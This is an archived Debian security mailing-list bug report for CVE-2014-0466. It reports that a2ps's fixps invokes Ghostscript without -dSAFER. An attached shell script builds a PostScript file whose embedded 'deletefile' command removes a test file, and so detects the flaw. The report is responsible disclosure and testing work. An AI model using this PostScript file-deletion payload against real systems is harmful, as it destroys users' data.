[Secure-testing-team] Bug#742902: a2ps: CVE-2014-0466: does not invoke gs with -dSAFER

brian m. carlson sandals at crustytoothpaste.net
Fri Mar 28 20:03:36 UTC 2014


Package: a2ps
Version: 1:4.14-1.2
Severity: grave
Tags: security

fixps does not invoke gs with -dSAFER.  As a consequence, a malicious
PostScript file could delete files with the privileges of the invoking
user.

I have provided a test script that can be invoked as such:

  ./test-wrapper-fixps fixps

This was reported to the Debian Security Team, who assigned this
CVE-2014-0466.  It was also reported to upstream, who has not provided
an update or issued a fixed version.  This is being reported publicly as
over 45 days has elapsed and neither upstream nor the security team has
requested a delay or issued an advisory.

-- System Information:
Debian Release: jessie/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.14-rc7-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages a2ps depends on:
ii  file       1:5.17-1
ii  libc6      2.18-4
ii  libpaper1  1.1.24+nmu2
ii  psutils    1.17.dfsg-1

Versions of packages a2ps recommends:
ii  bzip2           1.0.6-5
ii  cups-bsd [lpr]  1.7.1-10
ii  wdiff           1.2.1-2

Versions of packages a2ps suggests:
pn  emacsen-common                       <none>
ii  ghostscript                          9.05~dfsg-8+b1
ii  groff                                1.22.2-5
pn  gv                                   <none>
pn  html2ps                              <none>
ii  imagemagick                          8:6.7.7.10+dfsg-1
pn  t1-cyrillic                          <none>
ii  texlive-binaries [texlive-base-bin]  2013.20130729.30972-2+b2

-- no debconf information

-- 
brian m. carlson / brian with sandals: Houston, Texas, US
+1 832 623 2791 | http://www.crustytoothpaste.net/~bmc | My opinion only
OpenPGP: RSA v4 4096b: 88AC E9B2 9196 305B A994 7552 F1BA 225C 0223 B187
-------------- next part --------------
#!/bin/sh
# test-wrapper: test if a program is running gs without -dSAFER
#
# Usage: test-wrapper program --option --option2

TEMPDIR=`mktemp -d`

[ -n "$TEMPDIR" ] || exit 1

touch "$TEMPDIR/remove-me"
groff -Tps <<EOM | sed -e '/%%Pages/d' >"$TEMPDIR/exploit.ps"
Text
\X'ps: exec ($TEMPDIR/remove-me) deletefile'
More text.
EOM

"$@" "$TEMPDIR/exploit.ps" >/dev/null

if [ -e "$TEMPDIR/remove-me" ]
then
	printf "Program is not vulnerable.\n"
else
	printf "Program is VULNERABLE!\n"
fi
rm -r -- "$TEMPDIR"
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 819 bytes
Desc: Digital signature
URL: <http://lists.alioth.debian.org/pipermail/secure-testing-team/attachments/20140328/e8ddf305/attachment.sig>


More information about the Secure-testing-team mailing list